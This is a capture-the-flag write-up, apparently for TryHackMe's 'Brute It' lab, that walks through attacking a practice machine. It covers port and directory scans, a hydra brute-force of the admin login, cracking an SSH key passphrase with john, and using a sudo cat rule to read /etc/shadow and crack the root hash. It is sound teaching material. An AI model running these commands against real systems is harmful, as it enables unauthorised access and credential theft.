Add IP address to your hosts file:

echo '10.10.30.42    bruteit.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv bruteit.thm

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 22,80 bruteit.thm

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Now you can answer few questions:

How many ports are open?

What version of SSH is running?

What version of Apache is running?

Which Linux distribution is running?

Run directory scan on web application:

gobuster dir -u http://bruteit.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

===============================================================
2022/02/11 07:37:13 Starting gobuster
===============================================================
/index.html (Status: 200)
/admin (Status: 301)
/server-status (Status: 403)
===============================================================
2022/02/11 07:40:20 Finished
===============================================================

You can answer this question:

What is the hidden directory?

Check the web application running on port 80, browse to http://bruteit.thm

There is only default Apache page.

I viewed the page source, reviewed the information in developer console – found nothing interesting.

Browse to the admin page http://bruteit.thm/admin

View the page source:

Do you see the comment?

So we know username, use hydra to find the password – but first we need to know few things:

• if the login request is GET or POST
• what are username and password parameters
• what we can see if the credentials are incorrect
• is there a cookie we need to send with each request?

Open developer console (press F12) and try to login e.g. with admin and password:

Ok, as we can see here:

• POST method is used
• username parameter is user, password parameter is pass
• and if the provided credentials are incorrect, a “Username or password invalid” message appears
• and if we click on the Cookies tab – there is a cookie we need to set with hydra

Now we can use hydra:

hydra -l admin -P /usr/share/wordlists/rockyou.txt bruteit.thm http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password invalid:H=Cookie: security=low; PHPSESSID=esvtn7r8s3q2248hp62nok4uf8" -V -t 4 -f

[80][http-post-form] host: bruteit.thm   login: admin   password: [REDACTED]

Login with the credentials admin:[REDACTED] and grab the web flag:

Download the RSA private key – right click and Save Link As…

From the RSA private key generate a hash for john the ripper and try to crack it:

ssh2john.py id_rsa > id_rsa.hash
john -w=/usr/share/wordlists/rockyou.txt id_rsa.hash

[REDACTED]       (id_rsa)

Now login to the target machine via SSH, using john as username, downloaded private key and discovered password (first we need to change private key’s permisssions):

root@ip-10-10-244-156:~# chmod 600 id_rsa
root@ip-10-10-244-156:~# ssh john@bruteit.thm -i id_rsa
The authenticity of host 'bruteit.thm (10.10.30.42)' can't be established.
ECDSA key fingerprint is SHA256:6/bVnMDQ46C+aRgroR5KUwqKM6J9jAfSYFMQIOKckug.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'bruteit.thm,10.10.30.42' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)

john@bruteit:~$

Find user flag and read it:

john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt 
THM{[REDACTED]}

Now we need to find privilege escalation vector – start off with the basics:

john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat

Great, we can run /bin/cat as root so we can grab root flag right away:

john@bruteit:~$ sudo /bin/cat /root/root.txt
THM{[REDACTED]}

Now we need somehow to find out root’s password – should be easy since we can run cat as root, so we can read /etc/shadow:

john@bruteit:~$ sudo /bin/cat /etc/shadow | grep root
root:$6$zdk0.jUm$Vya2[REDACTED]88U9yUXEVgL.:18490:0:99999:7:::

Copy the root’s line from /etc/shadow, save it to a file, e.g. hash and try to crack it with john:

john -w=/usr/share/wordlists/rockyou.txt hash

[REDACTED]         (root)

Do you like this writeup? Check out other THM Writeups.